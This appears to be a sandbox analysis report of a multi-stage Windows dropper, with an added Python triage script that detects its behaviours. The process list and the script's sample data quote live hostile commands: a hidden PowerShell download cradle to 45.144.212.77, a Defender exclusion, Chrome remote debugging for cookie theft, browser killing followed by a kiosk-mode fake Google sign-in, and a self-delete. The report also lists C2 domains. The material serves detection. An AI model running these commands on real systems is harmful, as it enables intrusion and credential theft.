Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [blob data omitted] | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [blob data omitted] | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [blob data omitted] | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe
"C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe"
C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {30FCB4AD-7091-4EEA-9D54-B36AFCC25BC4} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]
C:\ProgramData\kplnh\nvwjc.exe
C:\ProgramData\kplnh\nvwjc.exe
C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 500
C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 1028
C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 1188
C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F90E.tmp\F90F.tmp\F910.bat C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\QanWmXjd\Anubis.exe""
C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe
"C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 1052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 1220
C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe
"C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 512
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 1020
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6f69758,0x7fef6f69768,0x7fef6f69778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe
"C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1572 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2224 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2256 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1944 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1336 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3416 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3528 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe
"C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe
"C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 1200
C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe
"C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\2nop8" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 11
C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe
"C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.0.1296375672\1433213446" -parentBuildID 20221007134813 -prefsHandle 1132 -prefMapHandle 1124 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f483df3f-b1a4-4423-b49d-69e0062c0cc8} 948 "\\.\pipe\gecko-crash-server-pipe.948" 1316 101f0158 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.1.256581804\1545010702" -parentBuildID 20221007134813 -prefsHandle 1552 -prefMapHandle 1548 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5e4eda8-9824-4bfb-9ea5-043b9bf01f7c} 948 "\\.\pipe\gecko-crash-server-pipe.948" 1564 43eb558 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.2.1412349720\247694493" -childID 1 -isForBrowser -prefsHandle 2076 -prefMapHandle 2072 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a69bac0-4b15-49c6-aa05-a11402ae1fca} 948 "\\.\pipe\gecko-crash-server-pipe.948" 2088 1015f358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.3.667336605\570302175" -childID 2 -isForBrowser -prefsHandle 2636 -prefMapHandle 2632 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cebff203-e8dc-4de1-96ef-3c6e6d4f970b} 948 "\\.\pipe\gecko-crash-server-pipe.948" 2652 1cea4958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.4.271526683\1969280333" -childID 3 -isForBrowser -prefsHandle 3864 -prefMapHandle 3860 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3abba5e3-6a00-4f35-ac60-e899e86a146e} 948 "\\.\pipe\gecko-crash-server-pipe.948" 3912 1fbb2a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.5.678688496\1769326617" -childID 4 -isForBrowser -prefsHandle 4020 -prefMapHandle 4024 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c9037f0-c1d0-4a33-80d8-a7360110c749} 948 "\\.\pipe\gecko-crash-server-pipe.948" 4008 1fcc7358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.6.1788730289\2049257363" -childID 5 -isForBrowser -prefsHandle 4184 -prefMapHandle 4188 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3201214d-8736-4275-b124-7da9daf25f25} 948 "\\.\pipe\gecko-crash-server-pipe.948" 4172 1fcc7f58 tab
C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe
"C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe"
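The process list above records, as raw command lines, most of the behaviours the summary flags: a hidden PowerShell download cradle, a Defender exclusion added with Add-MpPreference, Chrome started with a remote-debugging port (the DevTools protocol gives a local client the session's cookies), every browser killed with taskkill and Firefox relaunched in kiosk mode on a URL that smuggles a Google sign-in path into a youtube.com query string, and a delayed self-delete via cmd. The following script is an added example by the editor, not part of the report and not the sandbox's own signature logic; it runs the editor's heuristics over (image, command line) pairs copied from this section, with a few long command lines shortened, and keeps the renderer child processes that inherit --remote-debugging-port from producing one hit per tab.

```python
"""Rule-based triage of the command lines in a sandbox process list.

Added example for this page, not part of the original report and not any
sandbox vendor's detection logic. SAMPLE_PROCESSES is copied (some long
command lines shortened) from the report's Processes section; the rules are
the editor's own heuristics for the behaviours that section records.
"""
import re
from dataclasses import dataclass

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    detail: str


# Constructed from the report: (image path, command line) as the sandbox logged them.
SAMPLE_PROCESSES = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "
     "\"& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile "
     "'C:\\Users\\Admin\\AppData\\Local\\Temp\\installer.ps1'; Start-Process 'powershell.exe' "
     "-ArgumentList '-ExecutionPolicy Bypass -NoProfile -File installer.ps1' -WindowStyle Hidden}\""),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     '"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference '
     '-ExclusionPath "C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\QanWmXjd\\Anubis.exe""'),
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"'),
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --remote-debugging-port=9223 --lang=en-US'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\2nop8" & exit'),
    (r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /F /IM firefox.exe /T"),
    (r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /F /IM chrome.exe /T"),
    (r"C:\Program Files\Mozilla Firefox\firefox.exe",
     r'"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking'),
]


# Each rule is a predicate over (lower-cased image basename, command line).
def _download_cradle(img, cmd):
    # PowerShell pulling a second stage over HTTP (the Bypass/Hidden flags are typical, not required).
    return img == "powershell.exe" and bool(
        re.search(r"(?i)(invoke-webrequest|\biwr\b|downloadstring|downloadfile)", cmd)
        and re.search(r"(?i)https?://", cmd))

def _defender_exclusion(img, cmd):
    return img == "powershell.exe" and bool(re.search(r"(?i)(add|set)-mppreference\s+-(exclusion|disable)", cmd))

def _remote_debugging(img, cmd):
    # Browser (parent) process only: renderers inherit the flag and would each produce a hit.
    return img in BROWSERS and "--remote-debugging-port=" in cmd and "--type=" not in cmd

def _browser_kill(img, cmd):
    m = re.search(r"(?i)/IM\s+(\S+)", cmd)
    return img == "taskkill.exe" and bool(m) and m.group(1).lower() in BROWSERS

def _kiosk_lookalike(img, cmd):
    # Kiosk mode plus a URL whose query string embeds a second https:// URL.
    return img in BROWSERS and "--kiosk" in cmd and bool(re.search(r"https?://\S*\?\S*https?://", cmd))

def _self_delete(img, cmd):
    return img == "cmd.exe" and bool(re.search(r"(?i)timeout\s+/t\s+\d+.*&\s*rd\s+/s\s+/q", cmd))

RULES = {
    "powershell_download_cradle": _download_cradle,
    "defender_exclusion_added": _defender_exclusion,
    "browser_remote_debugging": _remote_debugging,
    "browser_process_killed": _browser_kill,
    "kiosk_mode_lookalike_url": _kiosk_lookalike,
    "cmd_self_delete_delay": _self_delete,
}


def triage(processes):
    """processes: iterable of (image_path, command_line). Returns findings in log order."""
    out = []
    for image, cmd in processes:
        base = image.rsplit("\\", 1)[-1].lower()
        for name, pred in RULES.items():
            if pred(base, cmd):
                out.append(Finding(name, image, cmd[:100]))
    # Correlation: kill every browser, then relaunch one in kiosk mode on a sign-in
    # lookalike; report the lockout-then-phish chain once, on top of the per-process hits.
    rules = {f.rule for f in out}
    if {"browser_process_killed", "kiosk_mode_lookalike_url"} <= rules:
        out.append(Finding("browser_lockout_then_phish", "(chain)", "taskkill -> --kiosk"))
    return out


def summarize(findings):
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage(SAMPLE_PROCESSES):
        print(f"{f.rule:28} {f.image}")
```

The lookalike-URL rule deliberately keys on structure (a second scheme inside the query string) rather than on the youtube.com host, so it also fires on the same trick against any other well-known domain.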
Network
| Country | Destination | Domain | Proto |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| NL | 45.154.98.175:6969 | | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| DE | 5.75.210.149:443 | | tcp |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| DE | 5.75.210.149:443 | | tcp |
| US | 8.8.8.8:53 | joyfulhezart.tech | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.64.1:443 | exarthynature.run | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4260 | towerbingobongoboom.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
